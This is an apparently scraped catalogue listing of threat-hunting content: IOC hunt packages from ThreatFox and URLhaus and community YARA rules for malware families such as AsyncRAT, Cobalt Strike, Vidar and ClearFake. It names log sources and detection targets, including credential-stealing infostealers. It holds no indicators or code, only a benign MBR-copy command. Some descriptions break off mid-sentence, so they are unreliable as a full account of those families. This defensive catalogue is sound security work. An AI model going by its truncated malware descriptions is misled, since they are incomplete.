CommonSecurityLog, DeviceNetworkEvents

Hunt package for 10 IOCs associated with AdaptixC2

apt, ioc, threatfox, win-adaptix_c2
ThreatFox: Amadey IOCs
ioc-hunt high
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with Amadey

ioc, threatfox, win-amadey
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 12 IOCs associated with AsyncRAT

backdoor, ioc, threatfox, win-asyncrat
ThreatFox: BianLian IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with BianLian

ioc, threatfox, win-bianlian
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 3 IOCs associated with Cobalt Strike

cobalt-strike, ioc, threatfox, win-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 5 IOCs associated with DCRat

backdoor, ioc, threatfox, win-dcrat
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with Ghost RAT

backdoor, ioc, threatfox, win-ghost_rat
ThreatFox source
DeviceFileEvents, UrlClickEvents

Hunt package for 4 IOCs associated with Loki Password Stealer (PWS)

infostealer, ioc, threatfox, win-lokipws
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Meterpreter

ioc, threatfox, win-meterpreter
ThreatFox source
DeviceFileEvents

Hunt package for 6 IOCs associated with Nanocore RAT

backdoor, ioc, threatfox, win-nanocore
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Quasar RAT

backdoor, ioc, threatfox, win-quasar_rat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with RansomHub

ioc, ransomware, threatfox, win-ransomhub
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 11 IOCs associated with Remcos

ioc, threatfox, win-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, UrlClickEvents

Hunt package for 2 IOCs associated with Remus

ioc, threatfox, win-remus
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with Taurus Stealer

infostealer, ioc, threatfox, win-taurus_stealer
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 4 IOCs associated with Vidar

ioc, threatfox, win-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 6 IOCs associated with VShell

ioc, threatfox, win-vshell
Elex Installer
yara low
Yara-Rules source

Elex Installer

community
Yara-Rules source

Elex Installer NSIS

community
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 57 malicious URLs tagged as 32-bit

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 3 malicious URLs tagged as 54e64e

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 24 malicious URLs tagged as ClearFake

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 6 malicious URLs tagged as CoinMiner

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 2 malicious URLs tagged as elf

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 4 malicious URLs tagged as malware_download

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 2 malicious URLs tagged as sh

ioc, urlhaus
Yara-Rules source

Detecting HTML strings used by Agent Tesla malware

community
Yara-Rules source

YARA rule: agenttesla_smtp_variant

community
Yara-Rules source

IOC looks for the creation or termination of a process associated with the Andromeda Trojan. The malware will execute the msiexec.exe within the suspicious directory. Shortly after, it creates and inj

backdoor, cobalt-strike, community
Yara-Rules source

APT28 downdelph magic string

apt, community, fancybear_downdelph
Yara-Rules source

APT28 downdelph string on MBR (get your MBR with BOOTICE on Win or #dd if=/dev/sda of=./sda.mbr bs=512 count=1)

apt, community, fancybear_downdelph
Arkei
yara low
Yara-Rules source

YARA rule: Arkei

community
Yara-Rules source

Generic PowerShell Malware Rule

community, powershell
ThreatFox: Tsunami IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents

Hunt package for 4 IOCs associated with Tsunami

elf-tsunami, ioc, threatfox
ThreatFox source
DnsEvents

Hunt package for 70 IOCs associated with ClearFake

ioc, js-clearfake, threatfox
ThreatFox: EtherRAT IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 6 IOCs associated with EtherRAT

backdoor, ioc, js-ether_rat, threatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 7 IOCs associated with KongTuke

ioc, js-kongtuke, threatfox
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 7 IOCs associated with SmartApeSG

ioc, js-smartapesg, threatfox
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 6 IOCs associated with Unknown malware

ioc, threatfox, unknown
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 11 IOCs associated with AdaptixC2

apt, ioc, threatfox, win-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 10 IOCs associated with AsyncRAT

backdoor, ioc, threatfox, win-asyncrat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 4 IOCs associated with Cobalt Strike

cobalt-strike, ioc, threatfox, win-cobalt_strike
ThreatFox source
DnsEvents

Hunt package for 7 IOCs associated with Lumma Stealer

infostealer, ioc, threatfox, win-lumma
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Quasar RAT

backdoor, ioc, threatfox, win-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 16 IOCs associated with Remcos

ioc, threatfox, win-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 2 IOCs associated with Remus

ioc, threatfox, win-remus
ThreatFox: Stealc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 28 IOCs associated with Stealc

ioc, threatfox, win-stealc
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 9 IOCs associated with Vidar

ioc, threatfox, win-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 5 IOCs associated with VShell

ioc, threatfox, win-vshell
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 3 malicious URLs tagged as 282234

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 62 malicious URLs tagged as 32-bit

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 32 malicious URLs tagged as ClearFake

ioc, urlhaus
Yara-Rules source

Gamarue_Andromeda

community
ThreatFox: Evilginx IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 4 IOCs associated with Evilginx

elf-evilginx, ioc, threatfox
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with Mirai

elf-mirai, ioc, threatfox
ThreatFox source
DnsEvents

Hunt package for 78 IOCs associated with ClearFake

ioc, js-clearfake, threatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 2 IOCs associated with KongTuke

ioc, js-kongtuke, threatfox
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 7 IOCs associated with SmartApeSG

ioc, js-smartapesg, threatfox
ThreatFox: AMOS IOCs
ioc-hunt high
ThreatFox source
DeviceFileEvents, DnsEvents

Hunt package for 5 IOCs associated with AMOS

ioc, osx-amos, threatfox
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 20 IOCs associated with Unknown malware

ioc, threatfox, unknown
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 12 IOCs associated with AdaptixC2

apt, ioc, threatfox, win-adaptix_c2
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with Agent Tesla

ioc, threatfox, win-agent_tesla
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 6 IOCs associated with AsyncRAT

backdoor, ioc, threatfox, win-asyncrat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 31 IOCs associated with Cobalt Strike

cobalt-strike, ioc, threatfox, win-cobalt_strike
ThreatFox source
DeviceFileEvents

Hunt package for 6 IOCs associated with Coinminer

ioc, threatfox, win-coinminer
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with DarkTortilla

ioc, threatfox, win-darktortilla
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 3 IOCs associated with DCRat

backdoor, ioc, threatfox, win-dcrat
ThreatFox source
DeviceFileEvents

Hunt package for 9 IOCs associated with FireCrypt

ioc, threatfox, win-firecrypt
ThreatFox: GCleaner IOCs
ioc-hunt high
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with GCleaner

ioc, threatfox, win-gcleaner
ThreatFox: GootKit IOCs
ioc-hunt high
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with GootKit

ioc, threatfox, win-gootkit
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 8 IOCs associated with Havoc

ioc, threatfox, win-havoc
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with MASS Logger

ioc, threatfox, win-masslogger
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Meterpreter

ioc, threatfox, win-meterpreter
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents

Hunt package for 4 IOCs associated with Nanocore RAT

backdoor, ioc, threatfox, win-nanocore
ThreatFox: Phorpiex IOCs
ioc-hunt high
ThreatFox source
DeviceFileEvents

Hunt package for 6 IOCs associated with Phorpiex

ioc, threatfox, win-phorpiex
ThreatFox: PureRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents

Hunt package for 6 IOCs associated with PureRAT

backdoor, ioc, threatfox, win-pure_rat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 4 IOCs associated with Quasar RAT

backdoor, ioc, threatfox, win-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 9 IOCs associated with Remcos

ioc, threatfox, win-remcos
ThreatFox: Sliver IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Sliver

ioc, threatfox, win-sliver
ThreatFox source
UrlClickEvents

Hunt package for 2 IOCs associated with SmokeLoader

ioc, threatfox, win-smokeloader
ThreatFox source
DeviceFileEvents, DnsEvents

Hunt package for 4 IOCs associated with StrelaStealer

infostealer, ioc, threatfox, win-strelastealer
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with TinyLoader

ioc, threatfox, win-tinyloader
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with troystealer

infostealer, ioc, threatfox, win-troystealer
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with ValleyRAT

backdoor, ioc, threatfox, win-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 6 IOCs associated with Vidar

ioc, threatfox, win-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 9 IOCs associated with VShell

ioc, threatfox, win-vshell
ThreatFox: XWorm IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 3 IOCs associated with XWorm

ioc, threatfox, win-xworm
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 31 malicious URLs tagged as 32-bit

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 12 malicious URLs tagged as censys

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 16 malicious URLs tagged as ClearFake

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 24 malicious URLs tagged as elf

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 13 malicious URLs tagged as mirai

ioc, urlhaus
ThreatFox: Evilginx IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Evilginx

elf-evilginx, ioc, threatfox
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, UrlClickEvents

Hunt package for 5 IOCs associated with Mirai

elf-mirai, ioc, threatfox
ThreatFox: RedTail IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 4 IOCs associated with RedTail

elf-redtail, ioc, threatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 4 IOCs associated with XMRIG

elf-xmrig, ioc, threatfox
ThreatFox source
DnsEvents

Hunt package for 27 IOCs associated with ClearFake

ioc, js-clearfake, threatfox
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 3 IOCs associated with SmartApeSG

ioc, js-smartapesg, threatfox
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 25 IOCs associated with Unknown malware

ioc, threatfox, unknown
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 7 IOCs associated with Unknown RAT

backdoor, ioc, threatfox, unknown_rat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 3 IOCs associated with AdaptixC2

apt, ioc, threatfox, win-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 7 IOCs associated with AsyncRAT

backdoor, ioc, threatfox, win-asyncrat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 13 IOCs associated with Cobalt Strike

cobalt-strike, ioc, threatfox, win-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 3 IOCs associated with DCRat

backdoor, ioc, threatfox, win-dcrat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with PureLogs Stealer

infostealer, ioc, threatfox, win-purelogs
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 14 IOCs associated with Remcos

ioc, threatfox, win-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, UrlClickEvents

Hunt package for 66 IOCs associated with Remus

ioc, threatfox, win-remus
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 5 IOCs associated with Vidar

ioc, threatfox, win-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 5 IOCs associated with VShell

ioc, threatfox, win-vshell
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 36 malicious URLs tagged as 32-bit

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 7 malicious URLs tagged as apk

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 15 malicious URLs tagged as ClearFake

ioc, urlhaus
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Kimwolf

apk-kimwolf, ioc, threatfox
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Mirai

elf-mirai, ioc, threatfox
ThreatFox source
DeviceFileEvents, DnsEvents, UrlClickEvents

Hunt package for 53 IOCs associated with ClearFake

ioc, js-clearfake, threatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DeviceFileEvents, DnsEvents, UrlClickEvents

Hunt package for 9 IOCs associated with KongTuke

ioc, js-kongtuke, threatfox
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 3 IOCs associated with SmartApeSG

ioc, js-smartapesg, threatfox
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 25 IOCs associated with Unknown malware

ioc, threatfox, unknown
ThreatFox source
DnsEvents

Hunt package for 5 IOCs associated with Unknown Stealer

infostealer, ioc, threatfox, unknown_stealer
ThreatFox: Amadey IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 2 IOCs associated with Amadey

ioc, threatfox, win-amadey
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 8 IOCs associated with AsyncRAT

backdoor, ioc, threatfox, win-asyncrat
ThreatFox: Berbew IOCs
ioc-hunt high
ThreatFox source
UrlClickEvents

Hunt package for 10 IOCs associated with Berbew

ioc, threatfox, win-berbew
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 13 IOCs associated with Cobalt Strike

cobalt-strike, ioc, threatfox, win-cobalt_strike
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Havoc

ioc, threatfox, win-havoc
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Nanocore RAT

backdoor, ioc, threatfox, win-nanocore
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 3 IOCs associated with PureLogs Stealer

infostealer, ioc, threatfox, win-purelogs
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Quasar RAT

backdoor, ioc, threatfox, win-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 6 IOCs associated with Remcos

ioc, threatfox, win-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 7 IOCs associated with Remus

ioc, threatfox, win-remus
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with ServHelper

ioc, threatfox, win-servhelper
ThreatFox: Tofsee IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 27 IOCs associated with Tofsee

iocthreatfoxwin-tofsee
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 34 IOCs associated with Vidar

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with VShell

iocthreatfoxwin-vshell
ThreatFox source
DeviceFileEventsUrlClickEvents

Hunt package for 2 IOCs associated with XTinyLoader

iocthreatfoxwin-xtinyloader
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as 213-111-144-211-8443

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 282234

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 41 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as Amadey

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as apk

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 6 malicious URLs tagged as ascii

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 12 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 12 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as exe

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 21 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 9 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as rat

backdooriocurlhaus
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 10 IOCs associated with Mirai

elf-miraiiocthreatfox
ThreatFox: RedTail IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with RedTail

elf-redtailiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 16 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
DnsEvents

Hunt package for 44 IOCs associated with IClickFix

iocjs-iclickfixthreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 9 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 9 IOCs associated with SmartApeSG

iocjs-smartapesgthreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 29 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
DnsEvents

Hunt package for 68 IOCs associated with Unknown Stealer

infostealeriocthreatfoxunknown_stealer
ThreatFox source
DnsEvents

The "Unknown Webinject" malware is designed to steal user credentials by injecting malicious scripts into legitimate websites during login processes. It typically arrives in environments through phishing emails or compromised websites that host the malicious domains. SOC analysts should look for unusual script injections in web traffic, unexpected credential exfiltration patterns, and

iocthreatfoxunknown_webinject
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 12 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: GCleaner IOCs
ioc-hunt high
ThreatFox source
UrlClickEvents

Hunt package for 14 IOCs associated with GCleaner

iocthreatfoxwin-gcleaner
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Havoc

iocthreatfoxwin-havoc
ThreatFox source
DnsEvents

Nanocore RAT is

backdooriocthreatfoxwin-nanocore
ThreatFox: NjRAT IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 6 IOCs associated with NjRAT

backdooriocthreatfoxwin-njrat
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 3 IOCs associated with PureLogs Stealer

infostealeriocthreatfoxwin-purelogs
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Quasar RAT is a remote access trojan that

backdooriocthreatfoxwin-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 18 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox source
DnsEvents

Hunt package for 8 IOCs associated with Socks5 Systemz

iocthreatfoxwin-socks5_systemz
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 33 IOCs associated with Vidar

iocthreatfoxwin-vidar
ThreatFox: XWorm IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 9 IOCs associated with XWorm

iocthreatfoxwin-xworm
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 141-98-10-98

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 39 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as ascii

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 13 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 11 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as KongTuke

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 23 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 5 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as Mozi

iocurlhaus
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Hunt package for 3 IOCs associated with Mirai

elf-miraiiocthreatfox
ThreatFox: RedTail IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with RedTail

elf-redtailiocthreatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsUrlClickEvents

Hunt package for 2 IOCs associated with XMRIG

elf-xmrigiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 83 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEvents

Hunt package for 10 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Unknown Stealer

infostealeriocthreatfoxunknown_stealer
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 7 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 10 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 21 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 8 IOCs associated with DCRat

backdooriocthreatfoxwin-dcrat
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Havoc

iocthreatfoxwin-havoc
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 3 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox: PureRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 17 IOCs associated with PureRAT

backdooriocthreatfoxwin-pure_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 7 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Sliver IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Sliver

iocthreatfoxwin-sliver
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 6 IOCs associated with VShell

iocthreatfoxwin-vshell
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 12 malicious URLs tagged as 176-65-139-126

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 9 malicious URLs tagged as 176-65-139-129

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 27 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 12 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 44 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The Mozi malware family is a backdoor that enables remote command execution and data exfiltration, often used for persistent access and lateral movement within compromised networks. It typically arrives via phishing emails or malicious websites, leveraging URLs and domains hosted on compromised or malicious infrastructure. SOC analysts

iocurlhaus
Yara-Rules source

Linux/Onimiki malicious DNS server

communitylinux/onimiki
